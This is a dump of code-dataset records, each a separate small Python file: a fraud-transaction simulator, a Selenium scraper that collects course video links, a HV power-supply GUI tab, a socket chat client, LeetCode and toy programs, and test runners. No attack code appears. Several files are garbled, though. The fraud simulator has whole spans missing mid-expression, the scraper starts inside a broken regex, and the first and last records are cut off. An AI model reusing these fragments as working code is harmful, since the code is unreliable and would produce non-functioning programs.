1, i + 1, running_loss / 10))\n running_loss = 0.0\n\nprint('Finished Training')\n\n","repo_name":"GabriellaKamlish/BrainResection","sub_path":"Inpainting2D/UNetTraining2D.py","file_name":"UNetTraining2D.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11806361589","text":"from loader import load\nfrom collections import Counter\n\n\ndef prepass(fname):\n duration, intersections, streets, cars, bonus = load(fname)\n\n res = []\n\n for street in streets:\n res.append(street[\"name\"])\n\n for car in cars:\n for street in car['path']:\n res.append(street)\n\n return dict(Counter(res))\n\n\ndef snapshot(fname):\n duration, intersections, streets, cars, bonus = load(fname)\n\n res = {}\n for street in streets:\n res[street['name']] = 0\n\n for car in cars:\n res[car['path'][0]] += 1\n\n return res\n\n\ndef restriction(streets, cars, start_time=0, end_time=100):\n times = {s[\"name\"]: s[\"time\"] for s in streets}\n car_timestamps = []\n for car in cars:\n current_time = 0\n car_timestamps.append({})\n for i in range(len(car[\"path\"])):\n if i >= 1:\n current_time += times[car[\"path\"][i]]\n car_timestamps[-1][current_time] = 
car[\"path\"][i] \n \n for i in range(len(car_timestamps)):\n car_timestamps[i] = {k: v for k, v in car_timestamps[i].items() if start_time < k < end_time}\n \n return car_timestamps\n\nif __name__ == '__main__':\n duration, intersections, streets, cars, bonus = load(\"a\")\n print(restriction(streets, cars, 0, 6))\n","repo_name":"liukidar/hashcode2021","sub_path":"prepass.py","file_name":"prepass.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33588962168","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 29 11:54:54 2020\r\n\r\n@author: Henry Yang\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n def strStr(self, haystack, needle):\r\n \"\"\"\r\n :type haystack: str\r\n :type needle: str\r\n :rtype: int\r\n \"\"\"\r\n i = 0\r\n if needle == \"\" or haystack == needle:\r\n return 0\r\n else:\r\n while i < len(haystack) - len(needle) + 1:\r\n if haystack[i] == needle[0]:\r\n if haystack[i:i+len(needle)] == needle:\r\n return i\r\n i += 1\r\n return -1","repo_name":"k65yang/general_code","sub_path":"Leetcode/Python/12-29.py","file_name":"12-29.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12124099099","text":"import os\nimport random\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime\nsns.set_style('whitegrid', {'axes.facecolor': '1'})\n\n# ----------------------------------------------------------------------\ndef Simulate_customer_profile_df(n_customers, random_state=66):\n np.random.seed(random_state)\n customer_id_property=[]\n # Generate customer location from uniform distributions \n for customer_id in range(n_customers):\n x_customer_id = np.random.uniform(0,100)\n y_customer_id = np.random.uniform(0,100)\n mean_amount = np.random.uniform(10,100) \n std_amount = mean_amount/2.5 \n mean_trans_per_day = np.random.uniform(0,5) # mean transactions nearby per day \n customer_id_property.append([customer_id,\n x_customer_id, y_customer_id,\n mean_amount, std_amount,\n mean_trans_per_day])\n customer_profiles_df = pd.DataFrame(customer_id_property, columns=['CUSTOMER_ID',\n 'location_x', 'location_y',\n 'Mean_trans', 'STD_trans',\n 'num_tran_day'])\n return customer_profiles_df\n\n# ----------------------------------------------------------------------\ndef Simulate_station_profiles_df(n_stations, random_state=66):\n np.random.seed(random_state)\n station_id_property=[]\n # Generate station locations from uniform distributions \n for store_id in range(n_stations):\n x_station_id = np.random.uniform(0,100)\n y_station_id = np.random.uniform(0,100)\n station_id_property.append([store_id,\n x_station_id, y_station_id]) \n station_profiles_df = pd.DataFrame(station_id_property, columns=['STORE_ID',\n 'Station_location_x', 'Station_location_y'])\n return station_profiles_df\n\n# ----------------------------------------------------------------------\ndef station_within_radius(customer_profile,x_y_stations, r):\n x_y_customer = customer_profile[['location_x','location_y']].values.astype(float)\n # Root of sum of squared difference\n squared_diff = np.square(x_y_customer - x_y_stations)\n # compute suared root to get distance\n dist = np.sqrt(np.sum(squared_diff, axis=1))\n # Get the indices of terminals which are at a distance within r\n available_stations = list(np.where(dist0:\n for trans in range(nb_trans):\n # 
We are trying to assume that most transactions happen during daytime\n time_trans = int(np.random.normal(86400/2, 20000))\n # We have at most 24 hours for a single day\n if (time_trans>0) and (time_trans<86400):\n # Transaction amount is drawn from a normal distribution \n amount = np.random.normal(customer_profile.Mean_trans,customer_profile.STD_trans)\n # If amount negative, we resample from a uniform distribution\n if amount<0:\n amount = np.random.uniform(0,customer_profile.Mean_trans*2)\n amount=np.round(amount,decimals=2)\n #Transactions need to happen at available stations.\n if len(customer_profile.available_stations)>0:\n store_id = random.choice(customer_profile.available_stations)\n customer_transactions.append([time_trans+day*86400, day,customer_profile.CUSTOMER_ID, store_id, amount])\n #We combine the all of the columns together.\n customer_transactions = pd.DataFrame(customer_transactions, columns=['Trans_TIME_SECONDS', 'Trans_TIME_DAYS', 'CUSTOMER_ID', 'STORE_ID', 'Trans_AMOUNT'])\n if len(customer_transactions)>0:\n customer_transactions['Trans_DATETIME'] = pd.to_datetime(customer_transactions[\"Trans_TIME_SECONDS\"], unit='s', origin=start_date)\n customer_transactions=customer_transactions[['Trans_DATETIME','CUSTOMER_ID', 'STORE_ID', 'Trans_AMOUNT','Trans_TIME_SECONDS', 'Trans_TIME_DAYS']]\n return customer_transactions \n\n# ----------------------------------------------------------------------\n#Go through the previous process all together.\ndef Simulate_dataset(n_customers = 10000, n_stations = 1000000, nb_days=90, start_date=\"2022-01-01\", r=7):\n customer_profiles_df = Simulate_customer_profile_df(n_customers, random_state = 3)\n station_profiles_df = Simulate_station_profiles_df(n_stations, random_state = 33)\n x_y_stations = station_profiles_df[['Station_location_x','Station_location_y']].values.astype(float)\n customer_profiles_df['available_stations'] = customer_profiles_df.apply(lambda x : station_within_radius(x, x_y_stations=x_y_stations, r=r), axis=1)\n customer_profiles_df['nb_stations']=customer_profiles_df.available_stations.apply(len)\n transactions_df=customer_profiles_df.groupby('CUSTOMER_ID').apply(lambda x : Simulate_transactions_df(x.iloc[0], nb_days=nb_days)).reset_index(drop=True)\n transactions_df=transactions_df.sort_values('Trans_DATETIME')\n transactions_df.reset_index(inplace=True,drop=True)\n transactions_df.reset_index(inplace=True)\n transactions_df.rename(columns = {'index':'TRANSACTION_ID'}, inplace = True)\n return (customer_profiles_df, station_profiles_df, transactions_df)\n\n# ----------------------------------------------------------------------\ndef Simulate_frauds(customer_profiles_df, station_profiles_df, transactions_df):\n transactions_df['Trans_FRAUD']=0\n #Transaction amount greater than 190 is considered fraud.\n transactions_df.loc[transactions_df.Trans_AMOUNT>190, 'Trans_FRAUD']=1\n #9 stations are frauds.\n for day in range(transactions_df.Trans_TIME_DAYS.max()):\n fraud_stations = station_profiles_df.STORE_ID.sample(n=9, random_state=day)\n fraud_transactions=transactions_df[(transactions_df.Trans_TIME_DAYS>=day) & (transactions_df.Trans_TIME_DAYS=day) & (transactions_df.Trans_TIME_DAYS[\\s]+(.*?)[\\s]+', res_href.text)[0] # 翻找数据存储网址并使用正则解析\r\n result = html.unescape(htmls.encode('utf-8').decode('unicode-escape')) # 整理转义字符并将unicode编码转为utf-8\r\n json_text = json.loads(result) # json解析\r\n if list.split('/')[-5]=='2885':\r\n href_id = [i['taskId'] for i in json_text if i['taskId'].startswith('7')] # 提取json字符串中的目标id并筛选\r\n 
else:\r\n href_id = [i['taskId'] for i in json_text if i['taskId'].startswith('6')]\r\n info.append(href_id[0:-1])\r\n print(info[0])\r\n x = 0\r\n\r\n try:\r\n while True:\r\n for i in info[x]: # 此处将一维列表与二维列表嵌套循环并拼接为视频所在地址\r\n driver = webdriver.Chrome()\r\n driver.get('https://edu.tipdm.org' + hrefs[x] + '/task/' + i +'/show') # 进入目标视频播放地址\r\n\r\n driver.find_element_by_name(\"_username\").send_keys(\"账号\") # 输入账号\r\n time.sleep(2)\r\n driver.find_element_by_id(\"login_password\").send_keys(\"密码\") # 输入密码\r\n time.sleep(1)\r\n driver.find_element_by_xpath(\"//*[@id='login-form']/div[4]/button\").click() # 点击登录\r\n HTML = etree.HTML(driver.page_source)\r\n time.sleep(1.5)\r\n title = HTML.xpath(\"//*[@id='dashboard-content']/div[1]/text()\") # 获取视频标题\r\n if title[1].strip().split(\":\")[1] =='进入实训平台':\r\n pass\r\n else:\r\n driver.get('https://edu.tipdm.org' + hrefs[x] + '/task/' + i +'/activity_show')\r\n innerHTML = driver.execute_script(\"return document.body.innerHTML\") # 获取网页js内容\r\n res = re.findall(\"(https:.*?.m3u8)\", innerHTML)[0] # 获取m3u8文件地址\r\n with open('数据.txt', 'a') as f:\r\n f.write(title[1].strip().split(\":\")[1] + ':' + res + '\\n') # 保存为文本(此处已经获取所有链接,但由于其需要苹果浏览器请求头伪装下载,直接调用ffmpeg不生效)\r\n time.sleep(20)\r\n driver.close()\r\n x += 1\r\n if x >13:\r\n break\r\n except IndexError:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n url()\r\n","repo_name":"xiaoxi-lyl/ShiPin","sub_path":"shipin.py","file_name":"shipin.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"7514114190","text":"class TAB_HV:\n def __init__(self):\n model = self.DPP.boardInfo.ModelName.decode()\n if model[-1] == 'M': self.sign = 1 - 2*self.DPP.HVCH\n elif model[-1] == 'P': self.sign = 1\n elif model[-1] == 'N': self.sign = -1\n\n vmax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].VMaxInfo.maximum\n vmin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].VMaxInfo.minimum\n imax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].ISetInfo.maximum\n imin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].ISetInfo.minimum\n umax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampUpInfo.maximum\n umin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampUpInfo.minimum\n dmax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampDownInfo.maximum\n dmin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampDownInfo.minimum\n self.gui.Title_0.setText(\"{} s/n {}, CH {}\".format(model, self.DPP.boardInfo.SerialNumber, self.DPP.HVCH))\n self.gui.Title_1.setText(\"Vₘₐₓ= {} V, Iₘₐₓ= {} μA\".format(int(vmax*self.sign), int(imax)))\n self.gui.VMax.setMaximum( vmax); self.gui.VMax.setMinimum( vmin)\n self.gui.IMax.setMaximum( imax); self.gui.IMax.setMinimum( imin)\n self.gui.RampUp.setMaximum( umax); self.gui.RampUp.setMinimum( umin)\n self.gui.RampDown.setMaximum(dmax); self.gui.RampDown.setMinimum(dmin)\n\n S = self.DPP.GetHVChannelPowerOn(self.DPP.HVCH)\n self.gui.V_ON.setChecked(S)\n self.gui.V_OFF.setChecked(not S)\n C = self.DPP.GetHVChannelConfiguration(self.DPP.HVCH)\n self.gui.VSet.setMaximum( int(C['VMax']))\n self.__SetValue(self.gui.VSet, int(C['VSet']))\n self.__SetValue(self.gui.VMax, int(C['VMax']))\n self.__SetValue(self.gui.IMax, int(C['ISet']))\n self.__SetValue(self.gui.RampUp, int(C['RampUp']))\n self.__SetValue(self.gui.RampDown, int(C['RampDown']))\n\n self.gui.V_ON.toggled.connect( self.__Switch_HV)\n self.gui.VSet.valueChanged.connect( self.__Set_HV)\n 
self.gui.VMax.valueChanged.connect( self.__Set_HV)\n self.gui.IMax.valueChanged.connect( self.__Set_HV)\n self.gui.RampUp.valueChanged.connect( self.__Set_HV)\n self.gui.RampDown.valueChanged.connect(self.__Set_HV)\n self.gui.timerA.timeout.connect( self.__Update_HV)\n\n def __SetValue(self, SB, V):\n SB.blockSignals(True); SB.setValue(V); SB.blockSignals(False) \n\n def __Update_HV(self):\n if self.gui.tab_HV.isVisible(): \n V, I = self.DPP.ReadHVChannelMonitoring(self.DPP.HVCH)\n if V is False:\n self.Disconnect()\n else:\n self.gui.VAct.display(self.sign*V); self.gui.IAct.display(I)\n if self.DPP.GetHVChannelStatus(0) == 'Disabled': \n self.gui.V_OFF.setChecked(True)\n self.gui.V_ON.setText(\"INH\")\n \n def __Switch_HV(self):\n if self.gui.V_OFF.isChecked(): self.DPP.SetHVChannelPowerOn(self.DPP.HVCH, 0)\n elif self.gui.V_ON.isChecked(): self.DPP.SetHVChannelPowerOn(self.DPP.HVCH, 1)\n \n def __Set_HV(self):\n P = {}\n P['VSet'] = float(self.gui.VSet.value())\n P['VMax'] = float(self.gui.VMax.value())\n P['ISet'] = float(self.gui.IMax.value())\n P['RampUp'] = float(self.gui.RampUp.value())\n P['RampDown'] = float(self.gui.RampDown.value())\n P['PWDownMode'] = int(0)\n self.DPP.SetHVChannelConfiguration(self.DPP.HVCH, P)\n self.DPP.SetHVChannelVMax(self.DPP.HVCH, P['VMax'])\n self.gui.VSet.setMaximum(P['VMax'])\n# print('set', self.DPP.HVCH)\n \n\n","repo_name":"muchnoi/HPGe-Acquisition","sub_path":"TABs/TAB_HV.py","file_name":"TAB_HV.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1998368724","text":"import os\nimport unittest\nimport HTMLTestRunner\nimport time\n\n\ndef all_case():\n # 获取所有测试模块\n s = unittest.TestLoader().discover(\n # 获取当前文件路径\n start_dir=os.path.join(os.path.dirname(__file__), \"test_case\"),\n # 选择文件\n pattern=\"test_*.py\",\n top_level_dir=None\n )\n return s\n\n\ndef get_now_time():\n return time.strftime('%Y-%m-%d %H-%M-%S', time.localtime())\n\n\ndef run():\n # 拼接文件路径\n file_name = os.path.join(\n os.path.dirname(__file__),\n \"report\",\n get_now_time() + '.html'\n ).replace('\\\\', '/')\n with open(file_name, \"wb\") as fp:\n runner = HTMLTestRunner.HTMLTestRunner(\n stream=fp,\n title=\"自动化测试\",\n description=\"必应测试\"\n )\n runner.run(all_case())\n\n\nif __name__ == '__main__':\n run()\n\n\n\n\n\n","repo_name":"ycw786369470/myblog","sub_path":"auto_test/Code/bing_test/all_test.py","file_name":"all_test.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8724684233","text":"import pytest\nimport torch\nimport numpy as np\nimport pugh_torch as pt\n\n\n@pytest.fixture\ndef random_input():\n return torch.rand(10, 11, 12, 13)\n\n\ndef test_batch_index_select_basic(random_input):\n dim = 1\n n_sample = 20\n\n expected_shape = list(random_input.shape)\n expected_shape[dim] = n_sample\n expected_shape = tuple(expected_shape)\n\n index = torch.randint(\n 0, random_input.shape[dim], size=(random_input.shape[0], n_sample)\n )\n result = pt.batch_index_select(random_input, dim=dim, index=index)\n\n assert result.shape == expected_shape\n\n\ndef test_batch_index_simple():\n dim = 1\n n_sample = 20\n\n input = torch.Tensor(np.arange(3 * 4).reshape(3, 4))\n index = torch.LongTensor(\n np.array(\n [\n [2, 0],\n [1, 1],\n [0, 3],\n ]\n )\n )\n\n expected = np.array(\n [\n [2, 0],\n [5, 5],\n [8, 11],\n ],\n )\n\n result = pt.batch_index_select(input, dim=dim, 
index=index)\n result = result.detach().cpu().numpy()\n\n assert result.shape == (3, 2)\n assert (result == expected).all()\n\n\ndef test_batch_index_select_negative_index(random_input):\n dim = 3\n n_sample = 20\n\n expected_shape = list(random_input.shape)\n expected_shape[dim] = n_sample\n expected_shape = tuple(expected_shape)\n\n index = torch.randint(\n 0, random_input.shape[dim], size=(random_input.shape[0], n_sample)\n )\n result = pt.batch_index_select(random_input, dim=-1, index=index)\n\n assert result.shape == expected_shape\n","repo_name":"BrianPugh/pugh_torch","sub_path":"pugh_torch/tests/utils/test_batch_index_select.py","file_name":"test_batch_index_select.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"34757398728","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndef plot_points_from_excel(file_path):\n df = pd.read_excel(file_path)\n plt.figure()\n num_columns = df.shape[1] # Get the number of columns\n print(f\"Number of columns in the Excel spreadsheet: {num_columns}\") # Print the number of columns\n\n legend_labels = {\n 'No Sidecars': 'No Sidecars',\n 'Client Sidecar': 'Client Sidecar',\n 'Server Sidecar': 'Server Sidecar',\n 'Both Sidecars': 'Both Sidecars'\n }\n colors = ['blue', 'red', 'green', 'purple']\n\n for i, col in enumerate(df.columns):\n label = legend_labels.get(col, col)\n plt.scatter(df.index, df[col], label=label, color=colors[i], alpha=0.7)\n\n # Calculate the median for each color\n median_value = df[col].median()\n mean_value = df[col].mean()\n\n # Modify the legend label to include median value\n median_label = f'Median {label}: {median_value:.1f} ms'\n\n plt.axhline(median_value, color=colors[i], linestyle='-', label=median_label)\n\n plt.yscale('log')\n\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Latency in ms (log scale)\")\n plt.title(\"Four Cases\")\n\n custom_legend = [plt.Line2D([], [], color=colors[i], marker='o', linestyle='', label=label) for i, label in enumerate(legend_labels.values())]\n plt.legend(handles=custom_legend, loc='upper left')\n\n plt.tight_layout()\n plt.savefig('four_cases_graph.png') # Save the figure before showing it\n plt.show()\n\nplot_points_from_excel('output.xlsx')\n","repo_name":"tomas-salgado/ServiceMeshTestingToolkit","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"569349355","text":"# Number Guessing Game Objectives:\nfrom random import randint\n# Include an ASCII art logo.\nfrom ascii import logo\n# Allow the player to submit a guess for a number between 1 and 100.\n# Check user's guess against actual answer. Print \"Too high.\" or \"Too low.\" depending on the user's answer.\n# If they got the answer correct, show the actual answer to the player.\n# Track the number of turns remaining.\n# If they run out of turns, provide feedback to the player.\n# Include two different difficulty levels (e.g., 10 guesses in easy mode, only 5 guesses in hard mode).\n\n\nEASY_LEVEL_TURNS = 10\nHARD_LEVEL_TURNS = 5\n\n\ndef check_number(guess, answer, turns):\n if guess > answer:\n print(\"Too High\")\n return turns - 1\n elif guess < answer:\n print(\"Too Low\")\n return turns - 1\n else:\n print(f\"You got it! 
The answer was {answer}.\")\n\n\ndef check_difficulty(level):\n if level == \"easy\":\n return EASY_LEVEL_TURNS\n else:\n return HARD_LEVEL_TURNS\n\n\ndef game():\n print(logo)\n print(\"-------------------------\")\n level = input(\"Choose a difficulty. Type 'easy' or 'hard': \")\n print(\"-------------------------\")\n answer = randint(1, 100)\n turns = check_difficulty(level)\n guess = 0\n\n while guess != answer:\n print(f\"You currently have {turns} reminding.\")\n\n guess = int(input(\"Make your guess: \"))\n\n turns = check_number(guess, answer, turns)\n if turns == 0:\n print(\"You run out of guesses, you lost!!\")\n print(f\"The answer was {answer}!!\")\n return\n else:\n print(\"Guess again!\")\n\n\ngame()\n","repo_name":"ping-n/python-100-days","sub_path":"guess_num/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29796140083","text":"#import library\nimport speech_recognition as sr\nimport time\n\n# Initialize recognizer class (for recognizing the speech)\nr = sr.Recognizer()\n\n# Reading Microphone as source\n# listening the speech and store in audio_text variable\ndef STT():\n with sr.Microphone() as source:\n print(\"Please wait. Calibrating microphone...\") \n # listen and create the ambient noise energy level \n r.adjust_for_ambient_noise(source, duration=5) \n r.dynamic_energy_threshold = True\n print(\"Talk\")\n audio_text = r.listen(source,timeout=5, phrase_time_limit= 15)\n print(\"Time over, thanks\")\n\n # recoginize_() method will throw a request error if the API is unreachable, hence using exception handling\n try:\n # using google speech recognition\n print(\"Text: \", r.recognize_google(audio_text))\n except sr.UnknownValueError:\n print(\"I didn't understand what you said.\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n\n return r.recognize_google(audio_text)\n\nif __name__ == \"__main__\":\n STT()","repo_name":"adityamaanas/openlab","sub_path":"English_STT.py","file_name":"English_STT.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"252930042","text":"# source : https://realpython.com/python-sockets/\r\nfrom encryption import *\r\n\r\nHOST = '127.0.0.1' # The server's hostname or IP address\r\nPORT = 65432 # The port used by the server\r\n\r\nif len(argv) > 1:\r\n\t# This means arg was passed. Assuming its IP\r\n\tHOST = str(argv[1])\r\n\r\nif len(argv) > 2:\r\n\t# this meanse two args was passed. Assuming it's port.\r\n\ttry:\r\n\t\tPORT = int(argv[2])\r\n\texcept:\r\n\t\tprint(\"Invalid port as argv. 
\" + str(PORT) + \" is now the port.\")\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\nconnected = True\r\nprint(f\"Connected to {HOST}:{PORT}!\")\r\n\r\nuseAsClient()\r\n\r\naes = difhel(s)\r\n\r\ndef listen():\r\n\tglobal s\r\n\tglobal connected\r\n\tglobal aes\r\n\r\n\tinDiffie = False\r\n\twhile connected:\r\n\t\tdata = receivedata(s, aes)\r\n\r\n\t\tif not data:\r\n\t\t\tconnected = False\r\n\t\t\tbreak\r\n\t\tif data == 'disconnect':\r\n\t\t\tsafeExit()\r\n\t\telif data == \"changekey\":\r\n\t\t\tssend(s, data, aes)\r\n\t\t\taes = difhel(s)\r\n\t\telse:\r\n\t\t\tprint(\"Server:\", data)\r\ndef sender():\r\n\tglobal s\r\n\tglobal connected\r\n\r\n\twhile connected:\r\n\t\ttry :\r\n\t\t\tmsg = str(input()).strip()\r\n\t\texcept EOFError:\r\n\t\t\tsafeExit()\r\n\r\n\t\tif msg == \"\":\r\n\t\t\tcontinue\r\n\t\telif len(msg) > 530:\r\n\t\t\tprint(\"ERROR: Your message was too big to send.\")\r\n\t\t\tcontinue\r\n\t\telif msg == \"disconnect\":\r\n\t\t\tsafeExit()\r\n\t\telif msg==\"clear\" or msg==\"cls\":\r\n\t\t\tcls()\r\n\t\telse:\r\n\t\t\tssend(s, msg, aes)\r\nt = threading.Thread(target=sender)\r\nt.daemon = True\r\n\r\ndef safeExit():\r\n\tglobal s\r\n\tglobal connected\r\n\r\n\tconnected = False\r\n\ttry:\r\n\t\tssend(s, \"disconnect\", aes)\r\n\texcept:\r\n\t\tpass\r\n\ts.close()\r\n\texit()\r\n\r\ntry:\r\n\tt.start()\r\n\tlisten()\r\nexcept:\r\n\tsafeExit()\r\ns.close()\r\n","repo_name":"SladetBask-Kasper/E2EE-CLI-Chat","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18251650193","text":"# coding:utf-8 \n'''\ncreated on 2018/5/8\n\n@author:sunyihuan\n'''\n\n\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param head: n\n @return: The new head of reversed linked list.\n \"\"\"\n\n def reverse(self, head):\n p1 = None\n p2 = head\n while (p2 is not None):\n tmp = p2.next\n p2.next = p1\n p1 = p2\n p2 = tmp\n return p1\n\n\ns = Solution()\nhead = ListNode(20, 3)\ncur = head\nfor i in range(1, 10):\n node = ListNode(i)\n cur.next = node\n cur = node\nhead = s.reverse(head)\nwhile (head != None):\n print(head.val, end=' ')\n head = head.next\n","repo_name":"sunyihuan326/analysis","sub_path":"LinCode/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35671342374","text":"FED_TAX = 0.05\r\nMUNICIPAL_TAX = 0.025\r\nQ_sales = float(input(\"Enter totals sales in $: \"))\r\n\r\n\r\ndef fed_tax_calculation():\r\n fed_tax = Q_sales * FED_TAX\r\n return fed_tax\r\n\r\n\r\ndef municipal_tax_calculation():\r\n municipal_tax = Q_sales * MUNICIPAL_TAX\r\n return municipal_tax\r\n\r\n\r\ndef total_taxes():\r\n fed_tax = fed_tax_calculation()\r\n municipal_tax = municipal_tax_calculation()\r\n total_tax = fed_tax + municipal_tax\r\n print(\"Federal taxes amounted: $\", format(fed_tax, \",.2f\"))\r\n print(\"Municipal taxes amounted: $\", format(municipal_tax, \",.2f\"))\r\n print(\"Total taxes amounted: $\", format(total_tax, 
\",.2f\"))\r\n\r\n\r\ntotal_taxes()\r\n","repo_name":"savelievayuliia/Starting-Out-with-Python-exercise-T-Gaddis","sub_path":"task09_program.py","file_name":"task09_program.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4485884359","text":"import math\n\ndef get(memory=\"4G\", cpu=1):\n '''calculate the resource requirements and return a\n dictonary that can be used to update the local variables'''\n\n if not memory.endswith(\"G\"):\n raise ValueError(\"Memory must be specified as XXG\")\n\n gb_requested = int(memory[:-1])\n\n mem_gb = int(math.ceil(gb_requested / float(cpu) ))\n\n spec = {\"job_memory\": str(mem_gb) + \"G\",\n \"job_threads\": cpu,\n \"r_memory\": gb_requested * 1000}\n\n return spec\n","repo_name":"oxfp/tenx","sub_path":"pipelines/pipeline_utils/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40415800096","text":"from django.conf import settings\r\nfrom datetime import datetime\r\nfrom dateutil.relativedelta import relativedelta\r\n\r\n\r\ndef core_values(request):\r\n data = {\r\n 'SITENAME': getattr(settings, 'SITENAME', \"il_doc's\"),\r\n 'ANALYTICS_ID': getattr(settings, 'ANALYTICS_ID', ''),\r\n 'YEARS': relativedelta(datetime.today(), datetime(1990, 6, 22)).years\r\n }\r\n return data\r\n","repo_name":"ildoc/ildoc.it_django","sub_path":"server/core/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12320713980","text":"def deposit(balance, money):\n print(\"입금이 완료 되었습니다. 잔액은 {0}원 입니다.\".format(balance + money))\n return balance + money\n\ndef withdraw(balacne, money): \n if balance >= money:\n print(\"출금이 완료되었습니다. 잔액은 {0} 원 입니다.\".format(balance - money))\n return balance - money\n else:\n print(\"출금이 완료되지 않았습니다. 잔액은 {0} 원 입니다\".format(balance))\n return balance\n\ndef withdraw_night(balance, money):\n commmission = 100 # 수수료\n return commmission, balance - money - commmission # 튜플, 여러 값을 반환\n\nbalance = 0\nbalance = deposit(balance, 1000)\nbalance = deposit(balance, 1000)\n\nbalance = withdraw(balance, 3000) # 실패\n\ncommmission, balance = withdraw_night(balance, 500)\nprint(\"수수료 {0}원이며, 잔액은 {1}원입니다.\".format(commmission, balance))","repo_name":"hjyu94/python","sub_path":"기본/26 [함수] 전달값과 반환값.py","file_name":"26 [함수] 전달값과 반환값.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37076350893","text":"# -*- coding: utf-8 -*-\nfrom builtins import (bytes, str, open, super, range,\n zip, round, input, int, pow, object)\n\nimport os\nimport re\nimport git\nimport fnmatch\nimport traceback\nfrom datetime import datetime\nimport filecmp\nimport sys\n\nfrom termcolor import colored\nimport colorama\ncolorama.init()\n\nimport gslab_make.private.metadata as metadata\nimport gslab_make.private.messages as messages\nfrom gslab_make.private.exceptionclasses import CritError, ColoredError\nfrom gslab_make.private.utility import norm_path, get_path, format_message, glob_recursive, open_yaml\nfrom gslab_make.write_logs import write_to_makelog\n\n\ndef _get_file_sizes(dir_path, exclude):\n \"\"\".. 
Walk through directory and get file sizes.\n \n Get file sizes for files in directory ``dir_path``, ignoring subdirectories in list ``exclude``.\n\n Parameters\n ----------\n dir_path : str\n Path of directory to walk through.\n exclude : list\n List of subdirectories to exclude when walking.\n\n Returns\n -------\n file_size : dict\n Dictionary of ``{file : size}`` for each file in ``dir_path``. \n \"\"\"\n\n file_sizes = []\n \n for root, dirs, files in os.walk(dir_path, topdown = True):\n dirs[:] = [d for d in dirs if d not in exclude]\n \n files = [os.path.join(root, f) for f in files]\n files = [norm_path(f) for f in files]\n sizes = [os.lstat(f).st_size for f in files]\n file_sizes.extend(zip(files, sizes))\n \n file_sizes = dict(file_sizes)\n \n return(file_sizes)\n\n \ndef _get_git_ignore(repo):\n \"\"\".. Get files ignored by git.\n \n Get files ignored by git for repository ``repo``.\n\n Parameters\n ----------\n repo : :class:`git.Repo`\n Git repository to get ignored files.\n\n Returns\n -------\n ignore_files : list\n List of files in repository ignored by git. \n \"\"\"\n\n g = git.Git(repo)\n root = repo.working_tree_dir\n\n ignore = g.execute('git status --porcelain --ignored', shell = True).split('\\n')\n ignore = [i for i in ignore if re.match('!!', i)]\n ignore = [i.lstrip('!!').strip() for i in ignore]\n ignore = [os.path.join(root, i) for i in ignore]\n\n ignore_files = []\n\n for i in ignore:\n if os.path.isfile(i):\n ignore_files.append(i)\n elif os.path.isdir(i):\n for root, dirs, files in os.walk(i):\n files = [os.path.join(root, f) for f in files]\n ignore_files.extend(files)\n\n ignore_files = [norm_path(i) for i in ignore_files]\n \n 